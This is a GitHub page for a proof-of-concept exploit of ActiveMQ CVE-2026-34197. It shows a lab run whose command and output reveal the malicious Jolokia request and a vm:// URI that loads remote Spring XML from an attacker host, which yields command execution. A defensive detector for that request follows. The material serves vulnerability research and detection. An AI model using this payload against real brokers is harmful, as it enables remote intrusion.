dinosn/CVE-2026-34197

GitHub: dinosn/CVE-2026-34197

Proof-of-concept code for the Apache ActiveMQ vulnerability CVE-2026-34197, which achieves remote command execution through Jolokia and the VM transport.

Stars: 6 | Forks: 0

# CVE-2026-34197

CVE-2026-34197 activemq PoC

PoC for ActiveMQ, based on the Horizon3 article https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

```
krasn@icestorm cve-2026-34197-activemq % docker compose up -d
krasn@icestorm cve-2026-34197-activemq % python3 exploit_poc.py auto \
    --target http://localhost:8161 \
    --lhost 192.168.1.17 --lport 9999 \
    --cmd "touch /tmp/blahblah.txt"
======================================================================
CVE-2026-34197 — ActiveMQ RCE via Jolokia + VM Transport
For authorized security testing and research only.
======================================================================
[*] Target: http://localhost:8161
[*] Command: touch /tmp/blahblah.txt
[*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml
[+] Jolokia accessible — agent version: unknown
[*] Could not discover broker name, using default 'localhost'
[*] Sending exploit payload to http://localhost:8161/api/jolokia/
[*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Jolokia returned 200 — exploit payload delivered
[+] Response: {
  "request": {
    "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
    "arguments": [
      "static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"
    ],
    "type": "exec",
    "operation": "addNetworkConnector(java.lang.String)"
  },
  "value": "NC",
  "timestamp": 1775616523,
  "status": 200
}
[*] Waiting 5s for target to fetch payload...
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Done. Verify command execution on target.
```
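A defender-side check for the request shape echoed in the output above, as an added example that is not part of this repository: it parses Jolokia POST bodies (captured, for instance, by a reverse proxy or WAF body log, which is an assumption) and flags `exec` calls to `addNetworkConnector` on an ActiveMQ MBean, adding a second finding when the argument is a `vm://` URI whose `brokerConfig` is an `xbean:` resource fetched over the network. The function name, finding strings and benign samples are constructed for illustration; GET-style Jolokia URLs are not covered.

```python
import json
import re
from urllib.parse import unquote

# vm:// transport URI whose brokerConfig is an xbean: resource fetched over the network
REMOTE_XBEAN = re.compile(r"vm://[^\s\"')]*[?&]brokerConfig=xbean:(?:https?|ftp)://", re.I)

def inspect_jolokia_body(body: str) -> list[str]:
    """Return findings for one Jolokia POST body (single request or bulk array)."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return []
    findings = []
    for req in parsed if isinstance(parsed, list) else [parsed]:
        if not isinstance(req, dict) or str(req.get("type", "")).lower() != "exec":
            continue
        mbean = str(req.get("mbean", ""))
        operation = str(req.get("operation", "")).split("(")[0]
        if not mbean.startswith("org.apache.activemq:") or operation != "addNetworkConnector":
            continue
        # Any runtime connector creation through Jolokia is worth an audit record.
        findings.append(f"addNetworkConnector exec on {mbean}")
        args = [unquote(str(a)) for a in (req.get("arguments") or [])]
        if any(REMOTE_XBEAN.search(a) for a in args):
            findings.append("vm:// URI loads remote xbean brokerConfig")
    return findings

# Request object as echoed in the PoC output on this page.
POC_REQUEST = json.dumps({
    "type": "exec",
    "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
    "operation": "addNetworkConnector(java.lang.String)",
    "arguments": ["static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"],
})
# Constructed benign samples: an attribute read and an ordinary tcp:// connector.
READ_REQUEST = json.dumps({"type": "read", "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", "attribute": "BrokerVersion"})
TCP_CONNECTOR = json.dumps({"type": "exec", "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", "operation": "addNetworkConnector", "arguments": ["static:(tcp://broker2.example:61616)"]})

if __name__ == "__main__":
    for name, body in [("poc", POC_REQUEST), ("read", READ_REQUEST), ("tcp", TCP_CONNECTOR)]:
        print(name, inspect_jolokia_body(body))
```

The first finding alone marks a connector added at runtime, which may be legitimate administration; the second finding is the pattern specific to this PoC's request.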
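Tags: ActiveMQ, Apache ActiveMQ, Broker, CISA project, CVE-2026-34197, Exploit, Jolokia, PoC, RCE, Spring XML, VM Transport, middleware, threat simulation, security testing, offensive security, brute force, proof of concept, message queue, vulnerability reproduction, programming tools, network security, request interception, remote code execution, reverse engineering tools, privacy protection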